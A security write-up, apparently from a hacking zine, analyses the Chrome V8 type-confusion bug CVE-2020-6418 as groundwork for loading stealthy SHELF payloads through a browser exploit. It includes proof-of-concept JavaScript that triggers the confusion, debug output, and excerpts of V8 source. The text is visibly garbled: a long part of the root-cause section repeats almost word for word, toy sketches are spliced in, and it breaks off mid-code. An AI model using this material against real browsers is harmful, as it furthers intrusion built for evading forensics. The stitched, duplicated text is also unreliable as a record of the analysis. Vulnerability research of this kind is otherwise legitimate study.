┌───────────────────────┐

▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ │

│ █ █ █ █ █ █ │

│ █ █ █ █ █▀▀▀▀ │

│ █ █ █ █ ▄ │

│ ▄▄▄▄▄ │

│ █ █ │

│ █ █ │

│ █▄▄▄█ │

│ ▄ ▄ │

│ █ █ │

│ █ █ │

│ █▄▄▄█ │

│ ▄▄▄▄▄ │

SHELF encounters of the elements kind │ █ │

Enabling SHELF Loading in Chrome for fun and profit. │ █ │

~ ulexec └───────────────────█ ──┘

Introduction ─────────────────────────────────────────────────────────────────────────//──

I've been focusing lately on Chrome exploitation, and after a while I became curious about

whether SHELF loading could be made to work for Chrome exploits targeting Linux.

If you are new to the concept of SHELF, it is a reflective loading methodology that my

colleague _Anonymous from Tmp.0ut and I wrote about[1] last year.

SHELF-based payloads offer several advantages, chiefly the ability to reflectively deploy

large, dependency-safe payloads as ELF binaries without invoking any of the execve family

of system calls.

Deploying SHELF payloads is not only convenient from a development perspective, but also

from an anti-forensics perspective. This is because analyzing SHELF images is often more

complex than analyzing conventional ELF binaries or shellcode, since SHELF images are

statically compiled, yet also position-independent. In addition, SHELF images can be

crafted to avoid the common ELF data structures that are critical for image reconstruction,

and, unlike the execve family of system calls, loading them leaves no process-hierarchy

footprint.

In short, SHELF has great prospects to be used within the browser to reflectively

load arbitrary payloads in the form of self-contained ELF binaries with anti-forensic

characteristics.

In this article, I will demonstrate how SHELF loading can be achieved in a Chrome exploit,

starting from an initial set of relative arbitrary read/write primitives to V8's heap.

I also wanted to present a concise analysis of a vulnerability that would grant these

kinds of initial exploitation primitives. I will be covering a vulnerability I've been

recently analyzing, CVE-2020-6418. However, feel free to skip to the Achieving Relative

Arbitrary Read/Write section if you are not interested in the root-cause analysis of this

particular vulnerability.

I would like to apologize in advance if there are still some mistakes or wrong assertions

I may have skipped over, or simply was unaware of during the creation of this article.

CVE-2020-6418 ────────────────────────────────────────────────────────────────────────//──

:: Regression Test Analysis ::

If we check the issue for this vulnerability, we can observe that a regression test[2]

file was committed, which will serve as an initial PoC for the vulnerability.

This regression test looks as follows:

// Copyright 2020 the V8 project authors. All rights reserved.

// Use of this source code is governed by a BSD-style license that can be

// found in the LICENSE file.

// Flags: --allow-natives-syntax

let a = [0, 1, 2, 3, 4];

function empty() {}

function f(p) {

a.pop(Reflect.construct(empty, arguments, p));

}

let p = new Proxy(Object, {

get: () => (a[0] = 1.1, Object.prototype)

});

function main(p) {

f(p);

}

%PrepareFunctionForOptimization(empty);

%PrepareFunctionForOptimization(f);

%PrepareFunctionForOptimization(main);

main(empty);

main(empty);

%OptimizeFunctionOnNextCall(main);

main(p);

We can also inspect the bug report[3] for a nice overview of the vulnerability:

Incorrect side effect modelling for JSCreate

The function NodeProperties::InferReceiverMapsUnsafe [1] is responsible for inferring

the Map of an object. From the documentation: "This information can be either

"reliable", meaning that the object is guaranteed to have one of these maps at runtime,

or "unreliable", meaning that the object is guaranteed to have HAD one of these maps.".

In the latter case, the caller has to ensure that the object has the correct type,

either by using CheckMap nodes or CodeDependencies.

On a high level, the InferReceiverMapsUnsafe function traverses the effect chain until

it finds the node creating the object in question and, at the same time, marks the

result as unreliable if it encounters a node without the kNoWrite flag [2], indicating

that executing the node could have side-effects such as changing the Maps of an object.

There is a mistake in the handling of kJSCreate [3]: if the object in question is not

the output of kJSCreate, then the loop continues *without* marking the result as

unreliable. This is incorrect because kJSCreate can have side-effects, for example by

using a Proxy as third argument to Reflect.construct. The bug can then for example be

triggered by inlining Array.pop and changing the elements kind from SMIs to Doubles

during the unexpected side effect.

As seen in the bug report, the vulnerability consists of incorrect side-effect modeling

for JSCreate. In other words, arbitrary JavaScript code can run while a JSCreate operation

executes, which invalidates assumptions that Turbofan's JIT compilation pipeline made when

it optimized the surrounding code.
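The side effect described in the report can be observed in plain JavaScript, without any d8 flags. The following is a minimal sketch (the names trapLog and created are illustrative and not part of the regression test) showing that passing a Proxy as the third argument of Reflect.construct makes the engine read its prototype property, which runs the handler's get trap in the middle of object creation:

```javascript
// Plain JavaScript sketch; runs in d8 or Node.js without extra flags.
function empty() {}

// Illustrative log of every property read that reaches the proxy.
const trapLog = [];

const proxy = new Proxy(Object, {
  get(target, key, receiver) {
    trapLog.push(String(key)); // arbitrary user code could run here
    return Reflect.get(target, key, receiver);
  },
});

// Constructing `empty` with the proxy as new.target forces a read of
// new.target.prototype, which is what fires the `get` trap.
const created = Reflect.construct(empty, [], proxy);

console.log(trapLog);
console.log(Object.getPrototypeOf(created) === Object.prototype);
```

Any code placed in the trap, such as the a[0] = 1.1 store in the regression test, therefore runs while the object is being created.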

If we modify the provided regression test to return the value popped from the array a, we

will see the following:

$ out.gn/x64.release/d8 --allow-natives-syntax ../regress.js

0

The value popped after the third call to function main is 0, when in reality it should

have returned 2. This means that the call to main(p) is somehow influencing the behavior

of array a's elements. We can see this clearly with the following modifications to the

regression test:

let a = [1.1, 1.2, 1.3, 1.4, 1.5];

function empty() {}

function f(p) {

return a.pop(Reflect.construct(empty, arguments, p));

}

let p = new Proxy(Object, {

get: () => (a[0] = {}, Object.prototype)

});

function main(p) {

return f(p);

}

%PrepareFunctionForOptimization(empty);

%PrepareFunctionForOptimization(f);

%PrepareFunctionForOptimization(main);

main(empty);

main(empty);

%OptimizeFunctionOnNextCall(main);

print(main(p));

If we run the previous script we will see the following:

$ out.gn/x64.release/d8 --allow-natives-syntax ./regress.js

4.735317402428105e-270





The elements kind of array a has transitioned from PACKED_DOUBLE_ELEMENTS to

PACKED_ELEMENTS. However, values popped from a via Array.prototype.pop are still returned

as doubles. This _elements kind_ transition can be seen in the diagram below, which shows

the allowed elements kind transitions within V8's JSArrays:

At this point, we can only speculate what is provoking this behavior. However, based on

observed triage of the regression test, this change of _elements kind_ is likely provoked

by the Proxy handler, which reassigns the indexed property a[0] to a JSObject instead of a

double value.

We can also suspect that this reassignment of one of the elements of a has likely

provoked V8 to reallocate the array, propagating a different _elements kind_ to a and

converting a's elements from double values to HeapNumber objects. However, it's

likely that the _elements kind_ inferred by Array.prototype.pop is incorrect, as

double values are still being retrieved.
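To make the direction of these transitions concrete, here is a toy model of the packed part of the elements-kind lattice. It is only a sketch and not V8 code: the names GENERALITY, classify and transition are hypothetical, holey kinds are left out, and the 31-bit Smi range is an assumption that holds for builds with pointer compression.

```javascript
// Toy model of the packed elements kinds, ordered from least to most general.
const GENERALITY = ["SMI", "DOUBLE", "ELEMENTS"];

// Decide which kind a single stored value requires (assumes 31-bit Smis).
function classify(value) {
  const isSmi = Number.isInteger(value) && !Object.is(value, -0) &&
                value >= -(2 ** 30) && value < 2 ** 30;
  if (isSmi) return "SMI";
  return typeof value === "number" ? "DOUBLE" : "ELEMENTS";
}

// Storing a value can only keep the kind or move it to a more general one.
function transition(kind, storedValue) {
  const current = GENERALITY.indexOf(kind);
  const needed = GENERALITY.indexOf(classify(storedValue));
  return GENERALITY[Math.max(current, needed)];
}

console.log(transition("SMI", 1.1));     // regression test: a[0] = 1.1
console.log(transition("DOUBLE", {}));   // modified PoC: a[0] = {}
console.log(transition("ELEMENTS", 1));  // never goes back to a narrower kind
```

In this model the store a[0] = {} from the modified PoC moves a DOUBLE array to ELEMENTS, matching the transition observed in the output.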

This can be seen in the d8 run below, in which calls to the native function

%DebugPrint have been placed in the PoC script before and after

the transition of elements kind:

$ out.gn/x64.debug/d8 --allow-natives-syntax ../regress.js

//----------------------------[BEFORE]--------------------------------

DebugPrint: 0x3d04080c6031: [JSArray]

- map: 0x3d0408281909 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]

- prototype: 0x3d040824923d <JSArray[0]>

- elements: 0x3d04080c6001 <FixedDoubleArray[5]> [PACKED_DOUBLE_ELEMENTS]

- length: 5

- properties: 0x3d04080406e9 <FixedArray[0]> {

#length: 0x3d04081c0165 <AccessorInfo> (const accessor descriptor)

}

- elements: 0x3d04080c6001 <FixedDoubleArray[5]> {

0-1: 1.1

2: 1.2

3: 1.3

4: 1.4

}

0x3d0408281909: [Map]

- type: JS_ARRAY_TYPE

- instance size: 16

- inobject properties: 0

- elements kind: PACKED_DOUBLE_ELEMENTS

- unused property fields: 0

- enum length: invalid

- back pointer: 0x3d04082818e1 <Map(HOLEY_SMI_ELEMENTS)>

- prototype_validity cell: 0x3d04081c0451 <Cell value= 1>

- instance descriptors #1: 0x3d04082498c1 <DescriptorArray[1]>

- transitions #1: 0x3d040824990d <TransitionArray[4]>Transition array #1:

0x3d0408042f75 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x3d0408281931 <Map(HOLEY_DOUBLE_ELEMENTS)>

- prototype: 0x3d040824923d <JSArray[0]>

- constructor: 0x3d0408249111 <JSFunction Array (sfi = 0x3d04081cc2dd)>

- dependent code: 0x3d04080401ed <Other heap object (WEAK_FIXED_ARRAY_TYPE)>

- construction counter: 0

//-----------------------------[AFTER]---------------------------------

4.735317402428105e-270

DebugPrint: 0x3d04080c6031: [JSArray]

- map: 0x3d0408281959 <Map(PACKED_ELEMENTS)> [FastProperties]

- prototype: 0x3d040824923d <JSArray[0]>

- elements: 0x3d04080c6295 <FixedArray[5]> [PACKED_ELEMENTS]

- length: 2

- properties: 0x3d04080406e9 <FixedArray[0]> {

#length: 0x3d04081c0165 <AccessorInfo> (const accessor descriptor)

}

- elements: 0x3d04080c6295 <FixedArray[5]> {

0: 0x3d04080c6279 <Object map = 0x3d04082802d9>

1: 0x3d04080c62bd <HeapNumber 1.1>

Received signal 11 SEGV_ACCERR 3d04fff80006

// ^ V8 CRASHES FETCHING ELEMENTS IN DEBUG BUILD

This gives us a type confusion when accessing any of the elements of a, as we will be

fetching a double representation of a HeapNumber object's tagged pointer. This

vulnerability would enable us to trivially create addrof and fakeobj primitives. However,

we will see moving forward that this won't work in newer V8 versions, and that a different

exploitation strategy is required in order to exploit this vulnerability.
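Since the confused loads surface as raw doubles, it helps to reinterpret their bit patterns as integers. A common way to do this in JavaScript is with typed arrays sharing one buffer. The helper names ftoi, itof and halves below are assumptions of this sketch and not part of the original PoC:

```javascript
// Two typed-array views over the same 8 bytes.
const scratch = new ArrayBuffer(8);
const asFloat = new Float64Array(scratch);
const asBits = new BigUint64Array(scratch);

// Reinterpret a double as its 64-bit pattern.
function ftoi(f) {
  asFloat[0] = f;
  return asBits[0];
}

// Reinterpret a 64-bit pattern as a double.
function itof(i) {
  asBits[0] = i;
  return asFloat[0];
}

// Split a double into its low and high 32-bit words.
function halves(f) {
  const bits = ftoi(f);
  return { low: bits & 0xffffffffn, high: bits >> 32n };
}

const leaked = 4.735317402428105e-270; // value printed by the modified PoC
const { low, high } = halves(leaked);
console.log("low  = 0x" + low.toString(16));
console.log("high = 0x" + high.toString(16));
```

Splitting a value into two 32-bit words is convenient if tagged values in the heap are 32 bits wide, which the shared upper half of the addresses in the %DebugPrint output may suggest.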

This is all there is to understand for now in relation to the supplied regression test.

Now let's dig into V8's source code to identify the root cause.

Root-Cause Analysis ──────────────────────────────────────────────────────────────────//──

Now that we have done a quick overview of the vulnerability and its implications from the

regression test, let's take a deep dive into V8's source to identify the root cause of

this vulnerability.





To start off, it is important to have in mind a high-level overview of Turbofan's JIT

compilation pipeline shown in the following diagram:


Among Turbofan's distinct phases, we can highlight the inlining/specialization phase,

in which builtin functions are lowered and specific nodes are reduced, such

as JSCall reduction and JSCreate lowering:

// Performs strength reduction on {JSConstruct} and {JSCall} nodes,

// which might allow inlining or other optimizations to be performed afterwards.

class V8_EXPORT_PRIVATE JSCallReducer final : public AdvancedReducer {

public:

// Flags that control the mode of operation.

enum Flag { kNoFlags = 0u, kBailoutOnUninitialized = 1u << 0 };

using Flags = base::Flags<Flag>;

JSCallReducer(Editor* editor, JSGraph* jsgraph, JSHeapBroker* broker,

Zone* temp_zone, Flags flags,

CompilationDependencies* dependencies)

: AdvancedReducer(editor),

jsgraph_(jsgraph),

broker_(broker),

temp_zone_(temp_zone),

flags_(flags),

dependencies_(dependencies) {}

// Lowers JSCreate-level operators to fast (inline) allocations.

class V8_EXPORT_PRIVATE JSCreateLowering final

: public NON_EXPORTED_BASE(AdvancedReducer) {

public:

JSCreateLowering(Editor* editor, CompilationDependencies* dependencies,

JSGraph* jsgraph, JSHeapBroker* broker, Zone* zone)

: AdvancedReducer(editor),

dependencies_(dependencies),

jsgraph_(jsgraph),

broker_(broker),

zone_(zone) {}

~JSCreateLowering() final = default;

const char* reducer_name() const override { return "JSCreateLowering"; }

Reduction Reduce(Node* node) final;

private:

Reduction ReduceJSCreate(Node* node);

During the inlining phase for our previous PoC, the Array.prototype.pop built-in function

is reduced.

The function in charge of doing so is JSCallReducer::ReduceArrayPrototypePop(Node* node),

shown below:

// ES6 section 22.1.3.17 Array.prototype.pop ( )

Reduction JSCallReducer::ReduceArrayPrototypePop(Node* node) {

DisallowHeapAccessIf disallow_heap_access(FLAG_concurrent_inlining);

DCHECK_EQ(IrOpcode::kJSCall, node->opcode());

CallParameters const& p = CallParametersOf(node->op());

if (p.speculation_mode() == SpeculationMode::kDisallowSpeculation) {

return NoChange();

}

Node* receiver = NodeProperties::GetValueInput(node, 1);

Node* effect = NodeProperties::GetEffectInput(node);

Node* control = NodeProperties::GetControlInput(node);

MapInference inference(broker(), receiver, effect);

if (!inference.HaveMaps()) return NoChange();

MapHandles const& receiver_maps = inference.GetMaps();

std::vector<ElementsKind> kinds;

if (!CanInlineArrayResizingBuiltin(broker(), receiver_maps, &kinds)) {

return inference.NoChange();

}

if (!dependencies()->DependOnNoElementsProtector()) UNREACHABLE();

inference.RelyOnMapsPreferStability(dependencies(), jsgraph(),

&effect, control, p.feedback());

...

// Load the "length" property of the {receiver}.

// Check if the {receiver} has any elements.

// Load the elements backing store from the {receiver}.

// Ensure that we aren't popping from a copy-on-write backing store.

// Compute the new {length}.

// Store the new {length} to the {receiver}.

// Load the last entry from the {elements}.

// Store a hole to the element we just removed from the {receiver}.

// Convert the hole to undefined. Do this last, so that we can optimize

// conversion operator via some smart strength reduction in many cases.

...

ReplaceWithValue(node, value, effect, control);

return Replace(value);

}

This function fetches the map of the receiver node by invoking MapInference inference(broker(), receiver, effect)

to then retrieve its elements kind and implement the logic for Array.prototype.pop.

For the sake of simplicity, the major operations performed by this function are summarized

by the comments in the source code shown above.
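The consequence of specializing these steps on an elements kind inferred at compile time can be illustrated with a toy model. This is a sketch under stated assumptions, not V8 code: the flat heap, the STORE offset, the compilePop helper and the marker value are all hypothetical, and tagged fields are assumed to be 32 bits wide while doubles take 64 bits.

```javascript
// Toy flat "heap" with an elements backing store at a hypothetical offset.
const heap = new DataView(new ArrayBuffer(64));
const STORE = 8;

// Element loads specialised per elements kind, as an inlined pop would be.
const loaders = {
  PACKED_DOUBLE_ELEMENTS: (i) => heap.getFloat64(STORE + i * 8, true),
  PACKED_ELEMENTS: (i) => heap.getUint32(STORE + i * 4, true),
};

// "Compile" pop once, for the kind inferred at optimisation time.
function compilePop(inferredKind) {
  const load = loaders[inferredKind];
  return (array) => {
    if (array.length === 0) return undefined; // receiver has no elements
    array.length -= 1;                        // store the new length
    return load(array.length);                // load the last entry
  };
}

const array = { length: 5 };
const pop = compilePop("PACKED_DOUBLE_ELEMENTS");

// Side effect after compilation: the store now holds five 32-bit tagged
// words (20 bytes) instead of five 64-bit doubles (40 bytes).
for (let i = 0; i < 5; i++) heap.setUint32(STORE + i * 4, 0x080c6001 + i * 8, true);
const storeEnd = STORE + 5 * 4;

// Marker standing in for whatever object happens to follow the store.
heap.setFloat64(STORE + 4 * 8, 1337.5, true);

const stale = pop(array); // still performs a 64-bit load at index 4
console.log(stale, STORE + 4 * 8 >= storeEnd);
```

In this model the stale double load for index 4 starts beyond the end of the reallocated store, so it returns data belonging to a neighbouring region rather than an element of the array.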

We should also highlight the call to inference.RelyOnMapsPreferStability, which we will

cover at a later stage. For now, let's focus on the MapInference constructor

along with some of its instance methods. These are shown below:

MapInference::MapInference(JSHeapBroker* broker, Node* object, Node* effect)

: broker_(broker), object_(object) {

ZoneHandleSet<Map> maps;

auto result =

NodeProperties::InferReceiverMapsUnsafe(broker_, object_, effect, &maps);

maps_.insert(maps_.end(), maps.begin(), maps.end());

maps_state_ = (result == NodeProperties::kUnreliableReceiverMaps)

? kUnreliableDontNeedGuard

: kReliableOrGuarded;

DCHECK_EQ(maps_.empty(), result == NodeProperties::kNoReceiverMaps);

}

MapInference::~MapInference() { CHECK(Safe()); }

bool MapInference::Safe() const { return maps_state_ != kUnreliableNeedGuard; }

void MapInference::SetNeedGuardIfUnreliable() {

CHECK(HaveMaps());

if (maps_state_ == kUnreliableDontNeedGuard) {

maps_state_ = kUnreliableNeedGuard;

}

}

void MapInference::SetGuarded() { maps_state_ = kReliableOrGuarded; }

bool MapInference::HaveMaps() const { return !maps_.empty(); }

We can notice that at the beginning of the constructor, a call to NodeProperties::InferReceiverMapsUnsafe

is performed. This function walks the effect chain in search of a node that can give

hints for inferring the map of the receiver object. At the same time, this function is

also in charge of marking the result as unreliable if it encounters a node without the

kNoWrite flag, indicating that executing the node could have side-effects such as changing

the map of an object.

This function returns an enum composed of three possible values which are the following:

// Walks up the {effect} chain to find a witness that provides map

// information about the {receiver}. Can look through potentially

// side effecting nodes.

enum InferReceiverMapsResult {

kNoReceiverMaps, // No receiver maps inferred.

kReliableReceiverMaps, // Receiver maps can be trusted.

kUnreliableReceiverMaps // Receiver maps might have changed (side-effect).

};

A summarized overview of the implementation of NodeProperties::InferReceiverMapsUnsafe is

shown below, highlighting the most important parts of this function:

// static

NodeProperties::InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(

JSHeapBroker* broker, Node* receiver, Node* effect,

ZoneHandleSet<Map>* maps_return) {

HeapObjectMatcher m(receiver);

if (m.HasValue()) {

HeapObjectRef receiver = m.Ref(broker);

// We don't use ICs for the Array.prototype and the Object.prototype

// because the runtime has to be able to intercept them properly, so

// we better make sure that TurboFan doesn't outsmart the system here

// by storing to elements of either prototype directly.

//

if (!receiver.IsJSObject() ||

!broker->IsArrayOrObjectPrototype(receiver.AsJSObject())) {

if (receiver.map().is_stable()) {

// The {receiver_map} is only reliable when we install a stability

// code dependency.

*maps_return = ZoneHandleSet<Map>(receiver.map().object());

return kUnreliableReceiverMaps;

}

}

}

InferReceiverMapsResult result = kReliableReceiverMaps;

while (true) {

switch (effect->opcode()) {

...

case IrOpcode::kJSCreate: {

if (IsSame(receiver, effect)) {

base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);

if (initial_map.has_value()) {

*maps_return = ZoneHandleSet<Map>(initial_map->object());

return result;

}

// We reached the allocation of the {receiver}.

return kNoReceiverMaps;

}

//result = kUnreliableReceiverMaps;

// ^ applied patch: JSCreate can have a side-effect.

break;

}

...

In this function, we can focus on the switch statement nested in a while loop that traverses

the effect chain. Each case in the switch statement handles a Turbofan IR opcode

relevant for map inference, in particular the opcode IrOpcode::kJSCreate.

This opcode will be generated for the invocation of Reflect.construct. Because this

JSCreate node is not the node that created the receiver, the loop simply moves past it

without updating result and keeps walking the effect chain. The Proxy handler invoked

by Reflect.construct can change the receiver's map, yet the function will still return a

result of kReliableReceiverMaps even though the receiver's map is no longer reliable.

We can see the patch applied to this function commented out, highlighting where the

vulnerability resides. The invocation of Reflect.construct is in fact able to

change the maps of the receiver node, in this case the JSArray a. However, due to a

logical error, NodeProperties::InferReceiverMapsUnsafe fails to mark the result as

kUnreliableReceiverMaps to denote that the receiver maps may have changed.
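The effect of the missing assignment can be reproduced with a small simulation of the effect-chain walk. This is a simplified sketch and not V8's implementation: the node objects, the "CheckMaps" witness and the inferReceiverMaps helper are hypothetical stand-ins, and only the JSCreate case mirrors the logic of the excerpt above.

```javascript
// Walk the effect chain upwards, looking for a witness of the receiver's map.
function inferReceiverMaps(receiver, effect, patched) {
  let result = "reliable";
  for (let node = effect; node !== null; node = node.effectInput) {
    switch (node.opcode) {
      case "CheckMaps": // hypothetical witness node carrying map information
        if (node.object === receiver) return { result, map: node.map };
        break;
      case "JSCreate":
        // The receiver itself was created here: its initial map is known.
        if (node === receiver) return { result, map: node.initialMap };
        // Patched behaviour: an unrelated JSCreate may run user code.
        if (patched) result = "unreliable";
        break;
      default:
        if (!node.noWrite) result = "unreliable";
    }
  }
  return { result: "none", map: null };
}

// Effect chain of the PoC, reduced to: witness for `a` <- JSCreate <- pop.
const a = { opcode: "Parameter", effectInput: null };
const witness = { opcode: "CheckMaps", object: a,
                  map: "PACKED_DOUBLE_ELEMENTS", effectInput: null };
const construct = { opcode: "JSCreate", initialMap: "JS_OBJECT",
                    effectInput: witness };

const buggy = inferReceiverMaps(a, construct, false);
const fixed = inferReceiverMaps(a, construct, true);
console.log(buggy.result, fixed.result);
```

Both runs find the same map for a, but only the patched walk reports it as unreliable, which is what later forces a guard to be emitted.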

The implications of not marking the result as unreliable become clear from the

invocation of MapInference::RelyOnMapsPreferStability by JSCallReducer::ReduceArrayPrototypePop,

shown below:

bool MapInference::RelyOnMapsPreferStability(

CompilationDependencies* dependencies, JSGraph* jsgraph, Node** effect,

Node* control, const FeedbackSource& feedback) {

CHECK(HaveMaps());

if (Safe()) return false;

if (RelyOnMapsViaStability(dependencies)) return true;

CHECK(RelyOnMapsHelper(nullptr, jsgraph, effect, control, feedback));

return false;

}

bool MapInference::RelyOnMapsHelper(CompilationDependencies* dependencies,

JSGraph* jsgraph, Node** effect,

Node* control,

const FeedbackSource& feedback) {

if (Safe()) return true;

auto is_stable = [this](Handle<Map> map) {

MapRef map_ref(broker_, map);

return map_ref.is_stable();

};

if (dependencies != nullptr &&

std::all_of(maps_.cbegin(), maps_.cend(), is_stable)) {

for (Handle<Map> map : maps_) {

dependencies->DependOnStableMap(MapRef(broker_, map));

}

SetGuarded();

return true;

} else if (feedback.IsValid()) {

InsertMapChecks(jsgraph, effect, control, feedback);

return true;

} else {

return false;

}

}

We can observe that a call to MapInference::Safe() is made, and if it returns true, the

function returns immediately. The implementation of this function is the following:

bool MapInference::Safe() const {

return maps_state_ != kUnreliableNeedGuard; }

Because the inference result was never marked as kUnreliableReceiverMaps, this function will

always return true. The assignment that determines this state is shown below:

maps_state_ = (result == NodeProperties::kUnreliableReceiverMaps)

? kUnreliableDontNeedGuard

: kReliableOrGuarded;





The code path that should mitigate this vulnerability is the one in which the function

InsertMapChecks is invoked. This function is in charge of adding a CheckMaps node before

the effect nodes that load and store the popped element from the receiver object,

ensuring that the correct map is used for these operations.
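The interaction between the three states and the guard insertion can be sketched as a small state machine. This is a simplified model, not V8's class: ToyMapInference and lowerPop are hypothetical names, the stability-dependency path is omitted, and the model assumes that consuming the inferred maps is what flips an unreliable result into the need-guard state.

```javascript
class ToyMapInference {
  constructor(inferResult) {
    // Mirrors the constructor excerpt: only "unreliable" starts unguarded.
    this.state = inferResult === "unreliable"
      ? "UnreliableDontNeedGuard"
      : "ReliableOrGuarded";
  }

  safe() {
    return this.state !== "UnreliableNeedGuard";
  }

  // Assumption of this sketch: reading the maps marks them as needing a guard.
  getMaps() {
    if (this.state === "UnreliableDontNeedGuard") {
      this.state = "UnreliableNeedGuard";
    }
  }

  // Insert a map check only when the inference is not already safe.
  relyOnMaps(effectChain) {
    if (this.safe()) return false;
    effectChain.push("CheckMaps");
    this.state = "ReliableOrGuarded";
    return true;
  }
}

// Model of the lowering: infer, consume the maps, guard, then load.
function lowerPop(inferResult) {
  const effectChain = [];
  const inference = new ToyMapInference(inferResult);
  inference.getMaps();
  inference.relyOnMaps(effectChain);
  effectChain.push("LoadElement");
  return effectChain;
}

console.log(lowerPop("reliable"));   // what the vulnerable inference produces
console.log(lowerPop("unreliable")); // what the patched inference produces
```

With a result wrongly reported as reliable, the model emits the element load without any preceding map check, which corresponds to the unguarded pop in the PoC.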

We can see that if we invoke Reflect.construct outside the context of Array.prototype.pop,

a CheckMaps node is inserted, as it should be for the conventional use of this function:

Within the distinct Turbofan's phases, we can highlight the inlining/specialization phase,

in which lowering of builtin functions and reduction of specific nodes is performed, such

as JSCall reduction and JSCreate lowering:

// Performs strength reduction on {JSConstruct} and {JSCall} nodes,

// which might allow inlining or other optimizations to be performed afterwards.

class V8_EXPORT_PRIVATE JSCallReducer final : public AdvancedReducer {

public:

// Flags that control the mode of operation.

enum Flag { kNoFlags = 0u, kBailoutOnUninitialized = 1u << 0 };

using Flags = base::Flags<Flag>;

JSCallReducer(Editor* editor, JSGraph* jsgraph, JSHeapBroker* broker,

Zone* temp_zone, Flags flags,

CompilationDependencies* dependencies)

: AdvancedReducer(editor),

jsgraph_(jsgraph),

broker_(broker),

temp_zone_(temp_zone),

flags_(flags),

dependencies_(dependencies) {}

// Lowers JSCreate-level operators to fast (inline) allocations.

class V8_EXPORT_PRIVATE JSCreateLowering final

: public NON_EXPORTED_BASE(AdvancedReducer) {

public:

JSCreateLowering(Editor* editor, CompilationDependencies* dependencies,

JSGraph* jsgraph, JSHeapBroker* broker, Zone* zone)

: AdvancedReducer(editor),

dependencies_(dependencies),

jsgraph_(jsgraph),

broker_(broker),

zone_(zone) {}

~JSCreateLowering() final = default;

const char* reducer_name() const override { return "JSCreateLowering"; }

Reduction Reduce(Node* node) final;

private:

Reduction ReduceJSCreate(Node* node);

For our previous PoC's Inlining phase, reduction of Array.prototype.pop built-in function

will be performed.

The function in charge of doing so is JSCallReducer::ReduceArrayPrototypePop(Node* node)

shown below:

// ES6 section 22.1.3.17 Array.prototype.pop ( )

Reduction JSCallReducer::ReduceArrayPrototypePop(Node* node) {

DisallowHeapAccessIf disallow_heap_access(FLAG_concurrent_inlining);

DCHECK_EQ(IrOpcode::kJSCall, node->opcode());

CallParameters const& p = CallParametersOf(node->op());

if (p.speculation_mode() == SpeculationMode::kDisallowSpeculation) {

return NoChange();

}

Node* receiver = NodeProperties::GetValueInput(node, 1);

Node* effect = NodeProperties::GetEffectInput(node);

Node* control = NodeProperties::GetControlInput(node);

MapInference inference(broker(), receiver, effect);

if (!inference.HaveMaps()) return NoChange();

MapHandles const& receiver_maps = inference.GetMaps();

std::vector<ElementsKind> kinds;

if (!CanInlineArrayResizingBuiltin(broker(), receiver_maps, &kinds)) {

return inference.NoChange();

}

if (!dependencies()->DependOnNoElementsProtector()) UNREACHABLE();

inference.RelyOnMapsPreferStability(dependencies(), jsgraph(),

&effect, control, p.feedback());

...

// Load the "length" property of the {receiver}.

// Check if the {receiver} has any elements.

// Load the elements backing store from the {receiver}.

// Ensure that we aren't popping from a copy-on-write backing store.

// Compute the new {length}.

// Store the new {length} to the {receiver}.

// Load the last entry from the {elements}.

// Store a hole to the element we just removed from the {receiver}.

// Convert the hole to undefined. Do this last, so that we can optimize

// conversion operator via some smart strength reduction in many cases.

...

ReplaceWithValue(node, value, effect, control);

return Replace(value);

}

This function will fetch the map of the receiver node by invoking MapInference inference(broker(), receiver, effect)

to then retrieve its elements kind as well as implement the logic for Array.protype.pop.

Major operations performed by this function are summarized by the comments in the source

code shown above for sake of simplicity.

We should also highlight the call to inference.RelyOnMapsPreferStability, which we will

cover in a later stage. For now, let's focus on the call to MapInference constructor

along with some of its instance methods. These are shown below:

MapInference::MapInference(JSHeapBroker* broker, Node* object, Node* effect)

: broker_(broker), object_(object) {

ZoneHandleSet<Map> maps;

auto result =

NodeProperties::InferReceiverMapsUnsafe(broker_, object_, effect, &maps);

maps_.insert(maps_.end(), maps.begin(), maps.end());

maps_state_ = (result == NodeProperties::kUnreliableReceiverMaps)

? kUnreliableDontNeedGuard

: kReliableOrGuarded;

DCHECK_EQ(maps_.empty(), result == NodeProperties::kNoReceiverMaps);

}

MapInference::~MapInference() { CHECK(Safe()); }

bool MapInference::Safe() const { return maps_state_ != kUnreliableNeedGuard; }

void MapInference::SetNeedGuardIfUnreliable() {

CHECK(HaveMaps());

if (maps_state_ == kUnreliableDontNeedGuard) {

maps_state_ = kUnreliableNeedGuard;

}

}

void MapInference::SetGuarded() { maps_state_ = kReliableOrGuarded; }

bool MapInference::HaveMaps() const { return !maps_.empty(); }

We can notice that at the beginning of the function, a call to NodeProperties::InferReceiverMapsUnsafe

is performed. This function walks the effect chain in search for a node that can give

hints into inferring the map of the receiver object. At the same time, this function is

also in charge of marking the result as unreliable if it encounters a node without the

kNoWrite flag, indicating that executing the node could have side-effects such as changing

the map of an object.

This function returns an enum composed of three possible values which are the following:

// Walks up the {effect} chain to find a witness that provides map

// information about the {receiver}. Can look through potentially

// side effecting nodes.

enum InferReceiverMapsResult {

kNoReceiverMaps, // No receiver maps inferred.

kReliableReceiverMaps, // Receiver maps can be trusted.

kUnreliableReceiverMaps // Receiver maps might have changed (side-effect).

A summerized overview of the implementation of NodeProperties::InferReceiverMapsUnsafe is

shown below, highlighting the most important parts of this function:

// static

NodeProperties::InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(

JSHeapBroker* broker, Node* receiver, Node* effect,

ZoneHandleSet<Map>* maps_return) {

HeapObjectMatcher m(receiver);

if (m.HasValue()) {

HeapObjectRef receiver = m.Ref(broker);

// We don't use ICs for the Array.prototype and the Object.prototype

// because the runtime has to be able to intercept them properly, so

// we better make sure that TurboFan doesn't outsmart the system here

// by storing to elements of either prototype directly.

//

if (!receiver.IsJSObject() ||

!broker->IsArrayOrObjectPrototype(receiver.AsJSObject())) {

if (receiver.map().is_stable()) {

// The {receiver_map} is only reliable when we install a stability

// code dependency.

*maps_return = ZoneHandleSet<Map>(receiver.map().object());

return kUnreliableReceiverMaps;

}

}

}

InferReceiverMapsResult result = kReliableReceiverMaps;

while (true) {

switch (effect->opcode()) {

...

case IrOpcode::kJSCreate: {

if (IsSame(receiver, effect)) {

base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);

if (initial_map.has_value()) {

